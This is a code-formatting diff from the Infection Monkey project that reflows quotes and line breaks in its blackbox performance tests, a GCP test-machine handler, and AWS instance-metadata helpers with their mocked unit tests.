monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid]
|
||||||
if not monkey_present:
|
if not monkey_present:
|
||||||
ips = [net_info['addr'] for net_info in telem['data']['network_info']['networks']]
|
ips = [net_info["addr"] for net_info in telem["data"]["network_info"]["networks"]]
|
||||||
if set(island_ips).intersection(ips):
|
if set(island_ips).intersection(ips):
|
||||||
on_island = True
|
on_island = True
|
||||||
else:
|
else:
|
||||||
on_island = False
|
on_island = False
|
||||||
|
|
||||||
monkeys.append(FakeMonkey(ips=ips,
|
monkeys.append(
|
||||||
guid=guid,
|
FakeMonkey(
|
||||||
fake_ip_generator=self.fake_ip_generator,
|
ips=ips,
|
||||||
on_island=on_island))
|
guid=guid,
|
||||||
|
fake_ip_generator=self.fake_ip_generator,
|
||||||
|
on_island=on_island,
|
||||||
|
)
|
||||||
|
)
|
||||||
return monkeys
|
return monkeys
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_island_ips_from_telems(telems: List[Dict]) -> List[str]:
|
def get_island_ips_from_telems(telems: List[Dict]) -> List[str]:
|
||||||
island_ips = []
|
island_ips = []
|
||||||
for telem in telems:
|
for telem in telems:
|
||||||
if 'config' in telem:
|
if "config" in telem:
|
||||||
island_ips = telem['config']['command_servers']
|
island_ips = telem["config"]["command_servers"]
|
||||||
for i in range(len(island_ips)):
|
for i in range(len(island_ips)):
|
||||||
island_ips[i] = island_ips[i].replace(":5000", "")
|
island_ips[i] = island_ips[i].replace(":5000", "")
|
||||||
return island_ips
|
return island_ips
|
||||||
|
|
|
@ -1,19 +1,21 @@
|
||||||
from unittest import TestCase
|
from unittest import TestCase
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
|
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
|
||||||
FakeIpGenerator
|
FakeIpGenerator,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
class TestFakeIpGenerator(TestCase):
|
class TestFakeIpGenerator(TestCase):
|
||||||
|
|
||||||
def test_fake_ip_generation(self):
|
def test_fake_ip_generation(self):
|
||||||
fake_ip_gen = FakeIpGenerator()
|
fake_ip_gen = FakeIpGenerator()
|
||||||
self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts)
|
self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts)
|
||||||
for i in range(256):
|
for i in range(256):
|
||||||
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])
|
fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"])
|
||||||
self.assertListEqual(['1.1.2.1'], fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
|
self.assertListEqual(["1.1.2.1"], fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]))
|
||||||
fake_ip_gen.fake_ip_parts = [256, 256, 255, 256]
|
fake_ip_gen.fake_ip_parts = [256, 256, 255, 256]
|
||||||
self.assertListEqual(['256.256.255.256', '256.256.256.1'],
|
self.assertListEqual(
|
||||||
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1', '1.1.1.2']))
|
["256.256.255.256", "256.256.256.1"],
|
||||||
|
fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1", "1.1.1.2"]),
|
||||||
|
)
|
||||||
fake_ip_gen.fake_ip_parts = [256, 256, 256, 256]
|
fake_ip_gen.fake_ip_parts = [256, 256, 256, 256]
|
||||||
self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
|
self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]))
|
||||||
|
|
|
@ -8,7 +8,9 @@ from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceA
|
||||||
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
|
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
|
||||||
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
|
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
|
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
|
||||||
|
SampleFileParser,
|
||||||
|
)
|
||||||
|
|
||||||
LOGGER = logging.getLogger(__name__)
|
LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -17,7 +19,6 @@ MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=60)
|
||||||
|
|
||||||
|
|
||||||
class TelemetryPerformanceTest:
|
class TelemetryPerformanceTest:
|
||||||
|
|
||||||
def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool):
|
def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
self.quick_performance_test = quick_performance_test
|
self.quick_performance_test = quick_performance_test
|
||||||
|
@ -27,29 +28,40 @@ class TelemetryPerformanceTest:
|
||||||
try:
|
try:
|
||||||
all_telemetries = SampleFileParser.get_all_telemetries()
|
all_telemetries = SampleFileParser.get_all_telemetries()
|
||||||
except FileNotFoundError:
|
except FileNotFoundError:
|
||||||
raise FileNotFoundError("Telemetries to send not found. "
|
raise FileNotFoundError(
|
||||||
"Refer to readme to figure out how to generate telemetries and where to put them.")
|
"Telemetries to send not found. "
|
||||||
|
"Refer to readme to figure out how to generate telemetries and where to put them."
|
||||||
|
)
|
||||||
LOGGER.info("Telemetries imported successfully.")
|
LOGGER.info("Telemetries imported successfully.")
|
||||||
all_telemetries.sort(key=lambda telem: telem['time']['$date'])
|
all_telemetries.sort(key=lambda telem: telem["time"]["$date"])
|
||||||
telemetry_parse_times = {}
|
telemetry_parse_times = {}
|
||||||
for telemetry in tqdm(all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"):
|
for telemetry in tqdm(
|
||||||
|
all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"
|
||||||
|
):
|
||||||
telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry)
|
telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry)
|
||||||
telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry)
|
telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry)
|
||||||
test_config = PerformanceTestConfig(MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME)
|
test_config = PerformanceTestConfig(
|
||||||
|
MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME
|
||||||
|
)
|
||||||
PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results()
|
PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results()
|
||||||
if not self.quick_performance_test:
|
if not self.quick_performance_test:
|
||||||
self.island_client.reset_env()
|
self.island_client.reset_env()
|
||||||
|
|
||||||
def get_telemetry_time(self, telemetry):
|
def get_telemetry_time(self, telemetry):
|
||||||
content = telemetry['content']
|
content = telemetry["content"]
|
||||||
url = telemetry['endpoint']
|
url = telemetry["endpoint"]
|
||||||
method = SupportedRequestMethod.__getattr__(telemetry['method'])
|
method = SupportedRequestMethod.__getattr__(telemetry["method"])
|
||||||
|
|
||||||
return self.island_client.requests.get_request_time(url=url, method=method, data=content)
|
return self.island_client.requests.get_request_time(url=url, method=method, data=content)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_verbose_telemetry_endpoint(telemetry):
|
def get_verbose_telemetry_endpoint(telemetry):
|
||||||
telem_category = ""
|
telem_category = ""
|
||||||
if "telem_category" in telemetry['content']:
|
if "telem_category" in telemetry["content"]:
|
||||||
telem_category = "_" + json.loads(telemetry['content'])['telem_category'] + "_" + telemetry['_id']['$oid']
|
telem_category = (
|
||||||
return telemetry['endpoint'] + telem_category
|
"_"
|
||||||
|
+ json.loads(telemetry["content"])["telem_category"]
|
||||||
|
+ "_"
|
||||||
|
+ telemetry["_id"]["$oid"]
|
||||||
|
)
|
||||||
|
return telemetry["endpoint"] + telem_category
|
||||||
|
|
|
@ -1,12 +1,17 @@
|
||||||
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
|
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
|
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import (
|
||||||
|
EndpointPerformanceTest,
|
||||||
|
)
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest
|
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import (
|
||||||
|
TelemetryPerformanceTest,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
class TelemetryPerformanceTestWorkflow(BasicTest):
|
class TelemetryPerformanceTestWorkflow(BasicTest):
|
||||||
|
def __init__(
|
||||||
def __init__(self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test):
|
self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test
|
||||||
|
):
|
||||||
self.name = name
|
self.name = name
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
self.performance_config = performance_config
|
self.performance_config = performance_config
|
||||||
|
@ -15,10 +20,14 @@ class TelemetryPerformanceTestWorkflow(BasicTest):
|
||||||
def run(self):
|
def run(self):
|
||||||
try:
|
try:
|
||||||
if not self.quick_performance_test:
|
if not self.quick_performance_test:
|
||||||
telem_sending_test = TelemetryPerformanceTest(island_client=self.island_client,
|
telem_sending_test = TelemetryPerformanceTest(
|
||||||
quick_performance_test=self.quick_performance_test)
|
island_client=self.island_client,
|
||||||
|
quick_performance_test=self.quick_performance_test,
|
||||||
|
)
|
||||||
telem_sending_test.test_telemetry_performance()
|
telem_sending_test.test_telemetry_performance()
|
||||||
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
|
performance_test = EndpointPerformanceTest(
|
||||||
|
self.name, self.performance_config, self.island_client
|
||||||
|
)
|
||||||
assert performance_test.run()
|
assert performance_test.run()
|
||||||
finally:
|
finally:
|
||||||
if not self.quick_performance_test:
|
if not self.quick_performance_test:
|
||||||
|
|
|
@ -11,14 +11,21 @@ class GCPHandler(object):
|
||||||
MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s"
|
MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s"
|
||||||
MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s"
|
MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s"
|
||||||
|
|
||||||
def __init__(self, key_path="../gcp_keys/gcp_key.json", zone="europe-west3-a", project_id="guardicore-22050661"):
|
def __init__(
|
||||||
|
self,
|
||||||
|
key_path="../gcp_keys/gcp_key.json",
|
||||||
|
zone="europe-west3-a",
|
||||||
|
project_id="guardicore-22050661",
|
||||||
|
):
|
||||||
self.zone = zone
|
self.zone = zone
|
||||||
try:
|
try:
|
||||||
# pass the key file to gcp
|
# pass the key file to gcp
|
||||||
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True) # noqa: DUO116
|
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True) # noqa: DUO116
|
||||||
LOGGER.info("GCP Handler passed key")
|
LOGGER.info("GCP Handler passed key")
|
||||||
# set project
|
# set project
|
||||||
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True) # noqa: DUO116
|
subprocess.call(
|
||||||
|
GCPHandler.get_set_project_command(project_id), shell=True
|
||||||
|
) # noqa: DUO116
|
||||||
LOGGER.info("GCP Handler set project")
|
LOGGER.info("GCP Handler set project")
|
||||||
LOGGER.info("GCP Handler initialized successfully")
|
LOGGER.info("GCP Handler initialized successfully")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -32,14 +39,18 @@ class GCPHandler(object):
|
||||||
"""
|
"""
|
||||||
LOGGER.info("Setting up all GCP machines...")
|
LOGGER.info("Setting up all GCP machines...")
|
||||||
try:
|
try:
|
||||||
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
|
subprocess.call(
|
||||||
|
(GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True
|
||||||
|
) # noqa: DUO116
|
||||||
LOGGER.info("GCP machines successfully started.")
|
LOGGER.info("GCP machines successfully started.")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)
|
LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)
|
||||||
|
|
||||||
def stop_machines(self, machine_list):
|
def stop_machines(self, machine_list):
|
||||||
try:
|
try:
|
||||||
subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
|
subprocess.call(
|
||||||
|
(GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True
|
||||||
|
) # noqa: DUO116
|
||||||
LOGGER.info("GCP machines stopped successfully.")
|
LOGGER.info("GCP machines stopped successfully.")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOGGER.error("GCP Handler failed to stop network machines: %s" % e)
|
LOGGER.error("GCP Handler failed to stop network machines: %s" % e)
|
||||||
|
|
|
@ -2,10 +2,14 @@ import pytest
|
||||||
|
|
||||||
|
|
||||||
def pytest_addoption(parser):
|
def pytest_addoption(parser):
|
||||||
parser.addoption("--island", action="store", default="",
|
parser.addoption(
|
||||||
help="Specify the Monkey Island address (host+port).")
|
"--island",
|
||||||
|
action="store",
|
||||||
|
default="",
|
||||||
|
help="Specify the Monkey Island address (host+port).",
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(scope='module')
|
@pytest.fixture(scope="module")
|
||||||
def island(request):
|
def island(request):
|
||||||
return request.config.getoption("--island")
|
return request.config.getoption("--island")
|
||||||
|
|
|
@ -31,22 +31,21 @@ machine_list = {
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(scope='class')
|
@pytest.fixture(scope="class")
|
||||||
def island_client(island):
|
def island_client(island):
|
||||||
island_client_object = MonkeyIslandClient(island)
|
island_client_object = MonkeyIslandClient(island)
|
||||||
yield island_client_object
|
yield island_client_object
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.usefixtures('island_client')
|
@pytest.mark.usefixtures("island_client")
|
||||||
# noinspection PyUnresolvedReferences
|
# noinspection PyUnresolvedReferences
|
||||||
class TestOSCompatibility(object):
|
class TestOSCompatibility(object):
|
||||||
|
|
||||||
def test_os_compat(self, island_client):
|
def test_os_compat(self, island_client):
|
||||||
print()
|
print()
|
||||||
all_monkeys = island_client.get_all_monkeys_from_db()
|
all_monkeys = island_client.get_all_monkeys_from_db()
|
||||||
ips_that_communicated = []
|
ips_that_communicated = []
|
||||||
for monkey in all_monkeys:
|
for monkey in all_monkeys:
|
||||||
for ip in monkey['ip_addresses']:
|
for ip in monkey["ip_addresses"]:
|
||||||
if ip in machine_list:
|
if ip in machine_list:
|
||||||
ips_that_communicated.append(ip)
|
ips_that_communicated.append(ip)
|
||||||
break
|
break
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
|
@ -6,11 +6,11 @@ import requests
|
||||||
from common.cloud.environment_names import Environment
|
from common.cloud.environment_names import Environment
|
||||||
from common.cloud.instance import CloudInstance
|
from common.cloud.instance import CloudInstance
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
|
|
||||||
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
|
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
|
||||||
AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
|
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
|
||||||
ACCOUNT_ID_KEY = "accountId"
|
ACCOUNT_ID_KEY = "accountId"
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
@ -20,6 +20,7 @@ class AwsInstance(CloudInstance):
|
||||||
"""
|
"""
|
||||||
Class which gives useful information about the current instance you're on.
|
Class which gives useful information about the current instance you're on.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def is_instance(self):
|
def is_instance(self):
|
||||||
return self.instance_id is not None
|
return self.instance_id is not None
|
||||||
|
|
||||||
|
@ -32,25 +33,35 @@ class AwsInstance(CloudInstance):
|
||||||
self.account_id = None
|
self.account_id = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
response = requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2)
|
response = requests.get(
|
||||||
|
AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2
|
||||||
|
)
|
||||||
self.instance_id = response.text if response else None
|
self.instance_id = response.text if response else None
|
||||||
self.region = self._parse_region(
|
self.region = self._parse_region(
|
||||||
requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').text)
|
requests.get(
|
||||||
|
AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone"
|
||||||
|
).text
|
||||||
|
)
|
||||||
except (requests.RequestException, IOError) as e:
|
except (requests.RequestException, IOError) as e:
|
||||||
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
|
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.account_id = self._extract_account_id(
|
self.account_id = self._extract_account_id(
|
||||||
requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).text)
|
requests.get(
|
||||||
|
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
|
||||||
|
).text
|
||||||
|
)
|
||||||
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
|
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
|
||||||
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))
|
logger.debug(
|
||||||
|
"Failed init of AwsInstance while getting dynamic instance data: {}".format(e)
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _parse_region(region_url_response):
|
def _parse_region(region_url_response):
|
||||||
# For a list of regions, see:
|
# For a list of regions, see:
|
||||||
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
|
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
|
||||||
# This regex will find any AWS region format string in the response.
|
# This regex will find any AWS region format string in the response.
|
||||||
re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
|
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
|
||||||
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
|
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
|
||||||
if finding:
|
if finding:
|
||||||
return finding[0]
|
return finding[0]
|
||||||
|
|
|
@ -6,24 +6,27 @@ from botocore.exceptions import ClientError
|
||||||
|
|
||||||
from common.cloud.aws.aws_instance import AwsInstance
|
from common.cloud.aws.aws_instance import AwsInstance
|
||||||
|
|
||||||
__author__ = ['itay.mizeretz', 'shay.nehmad']
|
__author__ = ["itay.mizeretz", "shay.nehmad"]
|
||||||
|
|
||||||
INSTANCE_INFORMATION_LIST_KEY = 'InstanceInformationList'
|
INSTANCE_INFORMATION_LIST_KEY = "InstanceInformationList"
|
||||||
INSTANCE_ID_KEY = 'InstanceId'
|
INSTANCE_ID_KEY = "InstanceId"
|
||||||
COMPUTER_NAME_KEY = 'ComputerName'
|
COMPUTER_NAME_KEY = "ComputerName"
|
||||||
PLATFORM_TYPE_KEY = 'PlatformType'
|
PLATFORM_TYPE_KEY = "PlatformType"
|
||||||
IP_ADDRESS_KEY = 'IPAddress'
|
IP_ADDRESS_KEY = "IPAddress"
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
def filter_instance_data_from_aws_response(response):
|
def filter_instance_data_from_aws_response(response):
|
||||||
return [{
|
return [
|
||||||
'instance_id': x[INSTANCE_ID_KEY],
|
{
|
||||||
'name': x[COMPUTER_NAME_KEY],
|
"instance_id": x[INSTANCE_ID_KEY],
|
||||||
'os': x[PLATFORM_TYPE_KEY].lower(),
|
"name": x[COMPUTER_NAME_KEY],
|
||||||
'ip_address': x[IP_ADDRESS_KEY]
|
"os": x[PLATFORM_TYPE_KEY].lower(),
|
||||||
} for x in response[INSTANCE_INFORMATION_LIST_KEY]]
|
"ip_address": x[IP_ADDRESS_KEY],
|
||||||
|
}
|
||||||
|
for x in response[INSTANCE_INFORMATION_LIST_KEY]
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
class AwsService(object):
|
class AwsService(object):
|
||||||
|
@ -45,8 +48,8 @@ class AwsService(object):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_client(client_type, region=None):
|
def get_client(client_type, region=None):
|
||||||
return boto3.client(
|
return boto3.client(
|
||||||
client_type,
|
client_type, region_name=region if region is not None else AwsService.region
|
||||||
region_name=region if region is not None else AwsService.region)
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_session():
|
def get_session():
|
||||||
|
@ -54,12 +57,12 @@ class AwsService(object):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_regions():
|
def get_regions():
|
||||||
return AwsService.get_session().get_available_regions('ssm')
|
return AwsService.get_session().get_available_regions("ssm")
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def test_client():
|
def test_client():
|
||||||
try:
|
try:
|
||||||
AwsService.get_client('ssm').describe_instance_information()
|
AwsService.get_client("ssm").describe_instance_information()
|
||||||
return True
|
return True
|
||||||
except ClientError:
|
except ClientError:
|
||||||
return False
|
return False
|
||||||
|
|
|
@ -2,14 +2,13 @@ import pytest
|
||||||
import requests
|
import requests
|
||||||
import requests_mock
|
import requests_mock
|
||||||
|
|
||||||
from common.cloud.aws.aws_instance import (AWS_LATEST_METADATA_URI_PREFIX,
|
from common.cloud.aws.aws_instance import AWS_LATEST_METADATA_URI_PREFIX, AwsInstance
|
||||||
AwsInstance)
|
|
||||||
from common.cloud.environment_names import Environment
|
from common.cloud.environment_names import Environment
|
||||||
|
|
||||||
|
|
||||||
INSTANCE_ID_RESPONSE = 'i-1234567890abcdef0'
|
INSTANCE_ID_RESPONSE = "i-1234567890abcdef0"
|
||||||
|
|
||||||
AVAILABILITY_ZONE_RESPONSE = 'us-west-2b'
|
AVAILABILITY_ZONE_RESPONSE = "us-west-2b"
|
||||||
|
|
||||||
# from https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
|
# from https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
|
||||||
INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
|
INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
|
||||||
|
@ -33,34 +32,33 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
EXPECTED_INSTANCE_ID = 'i-1234567890abcdef0'
|
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
|
||||||
|
|
||||||
EXPECTED_REGION = 'us-west-2'
|
EXPECTED_REGION = "us-west-2"
|
||||||
|
|
||||||
EXPECTED_ACCOUNT_ID = '123456789012'
|
EXPECTED_ACCOUNT_ID = "123456789012"
|
||||||
|
|
||||||
|
|
||||||
def get_test_aws_instance(text={'instance_id': None,
|
def get_test_aws_instance(
|
||||||
'region': None,
|
text={"instance_id": None, "region": None, "account_id": None},
|
||||||
'account_id': None},
|
exception={"instance_id": None, "region": None, "account_id": None},
|
||||||
exception={'instance_id': None,
|
):
|
||||||
'region': None,
|
|
||||||
'account_id': None}):
|
|
||||||
with requests_mock.Mocker() as m:
|
with requests_mock.Mocker() as m:
|
||||||
# request made to get instance_id
|
# request made to get instance_id
|
||||||
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
|
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
|
||||||
m.get(url, text=text['instance_id']) if text['instance_id'] else m.get(
|
m.get(url, text=text["instance_id"]) if text["instance_id"] else m.get(
|
||||||
url, exc=exception['instance_id'])
|
url, exc=exception["instance_id"]
|
||||||
|
)
|
||||||
|
|
||||||
# request made to get region
|
# request made to get region
|
||||||
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
|
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone"
|
||||||
m.get(url, text=text['region']) if text['region'] else m.get(
|
m.get(url, text=text["region"]) if text["region"] else m.get(url, exc=exception["region"])
|
||||||
url, exc=exception['region'])
|
|
||||||
|
|
||||||
# request made to get account_id
|
# request made to get account_id
|
||||||
url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
|
url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
|
||||||
m.get(url, text=text['account_id']) if text['account_id'] else m.get(
|
m.get(url, text=text["account_id"]) if text["account_id"] else m.get(
|
||||||
url, exc=exception['account_id'])
|
url, exc=exception["account_id"]
|
||||||
|
)
|
||||||
|
|
||||||
test_aws_instance_object = AwsInstance()
|
test_aws_instance_object = AwsInstance()
|
||||||
return test_aws_instance_object
|
return test_aws_instance_object
|
||||||
|
@ -69,9 +67,13 @@ def get_test_aws_instance(text={'instance_id': None,
|
||||||
# all good data
|
# all good data
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def good_data_mock_instance():
|
def good_data_mock_instance():
|
||||||
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
|
return get_test_aws_instance(
|
||||||
'region': AVAILABILITY_ZONE_RESPONSE,
|
text={
|
||||||
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
|
"instance_id": INSTANCE_ID_RESPONSE,
|
||||||
|
"region": AVAILABILITY_ZONE_RESPONSE,
|
||||||
|
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
def test_is_instance_good_data(good_data_mock_instance):
|
def test_is_instance_good_data(good_data_mock_instance):
|
||||||
|
@ -97,9 +99,13 @@ def test_get_account_id_good_data(good_data_mock_instance):
|
||||||
# 'region' bad data
|
# 'region' bad data
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def bad_region_data_mock_instance():
|
def bad_region_data_mock_instance():
|
||||||
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
|
return get_test_aws_instance(
|
||||||
'region': 'in-a-different-world',
|
text={
|
||||||
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
|
"instance_id": INSTANCE_ID_RESPONSE,
|
||||||
|
"region": "in-a-different-world",
|
||||||
|
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
def test_is_instance_bad_region_data(bad_region_data_mock_instance):
|
def test_is_instance_bad_region_data(bad_region_data_mock_instance):
|
||||||
|
@ -125,9 +131,13 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
|
||||||
# 'account_id' bad data
|
# 'account_id' bad data
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def bad_account_id_data_mock_instance():
|
def bad_account_id_data_mock_instance():
|
||||||
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
|
return get_test_aws_instance(
|
||||||
'region': AVAILABILITY_ZONE_RESPONSE,
|
text={
|
||||||
'account_id': 'who-am-i'})
|
"instance_id": INSTANCE_ID_RESPONSE,
|
||||||
|
"region": AVAILABILITY_ZONE_RESPONSE,
|
||||||
|
"account_id": "who-am-i",
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
def test_is_instance_bad_account_id_data(bad_account_id_data_mock_instance):
|
def test_is_instance_bad_account_id_data(bad_account_id_data_mock_instance):
|
||||||
|
@ -153,35 +163,37 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
|
||||||
# 'instance_id' bad requests
|
